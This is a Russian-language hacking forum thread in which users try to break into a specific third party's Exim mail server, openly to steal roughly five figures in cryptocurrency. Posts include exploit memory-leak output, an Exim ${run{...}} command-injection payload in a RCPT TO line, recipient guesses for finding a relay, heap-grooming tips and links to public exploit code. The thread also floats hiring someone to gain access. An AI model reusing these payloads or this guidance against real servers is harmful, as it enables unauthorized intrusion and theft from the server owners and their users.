exim remote RCE

[doesenemo]

CVE-2020-28018_checker.py
Говорит о том что цель уязвима​

Версия тоже старая уязвимая Exim 4.90_1 Ubuntu

нашел эксплойт:

GitHub - lockedbyte/CVE-2021-40444: CVE-2021-40444 PoC

CVE-2021-40444 PoC. Contribute to lockedbyte/CVE-2021-40444 development by creating an account on GitHub.

github.com

использую уже скомпилированный бинарий

Помогите разобраться почему не отрабатывает эксплойт

 

[varwar]

Реверсь бинарь, если нет исходников и сопоставляй код с отладочными принтами.

 

[doesenemo]

есть подвижки, помогите докрутить цель на 5 нулей крипто долларов
мои знания C нулевые

[+] Memory leak:

0x000000: 32 35 30 20 4f 4b 0d 0a 00 00 00 00 00 00 00 00 250 OK..........
0x000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x0000a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x0000b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x0000c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x0000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x0000e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x0000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...............

[+] Leaked heap address = 0x7f31f9da5010
[+] Leaked heap_base = 0x7f31f9d15330
[*] Searching for Exim configuration in memory...

в шапке не верная ссылка на git

CVE-Exploits/CVE-2020-28018 at master · lockedbyte/CVE-Exploits

PoC exploits for software vulnerabilities. Contribute to lockedbyte/CVE-Exploits development by creating an account on GitHub.

github.com

- CVE-2020-28020 (unauthenticated RCE as "exim", in Exim < 4.92);

кто нибудь находит exploit for CVE-2020-28020?

omg есть эксплойт RCE до root remote unauth

 

[doesenemo]

RCPT TO: postmaster
550 Unrouteable address
RCPT TO: pwner@localhost
550 relay not permitted

я нашел эксплойт который 100% отработает но нужно найти рабочий relay. знающие поделитесь гудзами или мысялми
там VESTA CP

exim вульгарно торчит
nc 11.11.11.11 2525

 

[poolshrimp]

RCPT TO: postmaster
550 Unrouteable address
RCPT TO: pwner@localhost
550 relay not permitted

я нашел эксплойт который 100% отработает но нужно найти рабочий relay. знающие поделитесь гудзами или мысялми
там VESTA CP

exim вульгарно торчит
nc 11.11.11.11 2525

• postmaster / postmaster@domain.com
• root / root@domain.com
• admin / admin@domain.com
• cpanel / cpanel@domain.com
• vesta / vesta@domain.com
• me / me@domain.com
• еще вариант - нагуглить живой email на нужном домене

По поводу 100% отработает - я бы не возлагал больших ожиданий. Игра с хипом - много звёзд должно сойтись, чтобы конфигурация была точно уязвима

Нужно подбирать количество RCPT TO после MAIL и перед NO + (downgrade tls) + OP для того, чтобы выделять / освобождать блоки памяти нужного размера и в нужных местах. И анализировать что куда утекает. gdb всё покажет.
Без понимания как работает аллокатор в exim, знания (понимания) языка C, навыков дебага заюзать эту дырку можно двумя путями:

1. Сесть разобраться самому. Я пошел этим путём. У меня не было вообще ничего из вышеперечисленных знаний. За пару месяцев разобрался, давно мозг так не скрипел. Полученные знания окуписись 1000-кратно, с тех пор в моем арсенале есть и продолжают появляться очень неплохие самописные игрушки и в целом работать стало интересней. В общем, рекомендую ))
2. Заплатить тому, кто уже разбирается. Даешь таргет - тебе добывают доступ. Тут, видимо, только на доверии, никогда так не делал (сразу оговорюсь, мне подобное не интересно, предлагать не стоит, но, возможно тут есть люди, кто возьмется, поищи)

Вариант взять эксплойт и тыкать наугад в этом случае крайне низкоэффективен, кмк.

 

[doesenemo]

• postmaster / postmaster@domain.com
• root / root@domain.com
• admin / admin@domain.com
• cpanel / cpanel@domain.com
• vesta / vesta@domain.com
• me / me@domain.com
• еще вариант - нагуглить живой email на нужном домене

По поводу 100% отработает - я бы не возлагал больших ожиданий. Игра с хипом - много звёзд должно сойтись, чтобы конфигурация была точно уязвима

Нужно подбирать количество RCPT TO после MAIL и перед NO + (downgrade tls) + OP для того, чтобы выделять / освобождать блоки памяти нужного размера и в нужных местах. И анализировать что куда утекает. gdb всё покажет.
Без понимания как работает аллокатор в exim, знания (понимания) языка C, навыков дебага заюзать эту дырку можно двумя путями:

1. Сесть разобраться самому. Я пошел этим путём. У меня не было вообще ничего из вышеперечисленных знаний. За пару месяцев разобрался, давно мозг так не скрипел. Полученные знания окуписись 1000-кратно, с тех пор в моем арсенале есть и продолжают появляться очень неплохие самописные игрушки и в целом работать стало интересней. В общем, рекомендую ))
2. Заплатить тому, кто уже разбирается. Даешь таргет - тебе добывают доступ. Тут, видимо, только на доверии, никогда так не делал (сразу оговорюсь, мне подобное не интересно, предлагать не стоит, но, возможно тут есть люди, кто возьмется, поищи)

Вариант взять эксплойт и тыкать наугад в этом случае крайне низкоэффективен, кмк.

Спасибо большое за ценную информацию
Я присмотрелся к версии и понял что у цели версия с RCE без игр с кучей
RCPT TO:<${run{\x2Fbin\x2Fsh\t-c\t\x22id\x3E\x3E\x2Ftmp\x2Fid\x22}}@localhost>

Вот только валидную RCPT TO: с ответом 250 OK не получается найти
550 Unrouteable address
550 relay not permited

из интересного получилось только:
MAIL FROM: postmaster@localhost
250 OK
RCPT TO: postmaster
451 Temporary local problem - please try later

https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt

 

[Crunch]

Тоже наткнулся на эту уязвимость более опытные ребята подскажите как эксплуатировали? так как у меня не получаеться эксплойтами.

 

[k1ddddos]

GitHub - dorkerdevil/CVE-2020-28018: exim use after free exploit and detection

exim use after free exploit and detection. Contribute to dorkerdevil/CVE-2020-28018 development by creating an account on GitHub.

github.com

Вот гит с экспом

 

[Crunch]

GitHub - dorkerdevil/CVE-2020-28018: exim use after free exploit and detection

exim use after free exploit and detection. Contribute to dorkerdevil/CVE-2020-28018 development by creating an account on GitHub.

github.com

Вот гит с экспом

Да вот в том то и дело эксплойты не работают, цель 99% уязвима ручками и сканерами тыкал, как я понял проблемы с аллокацией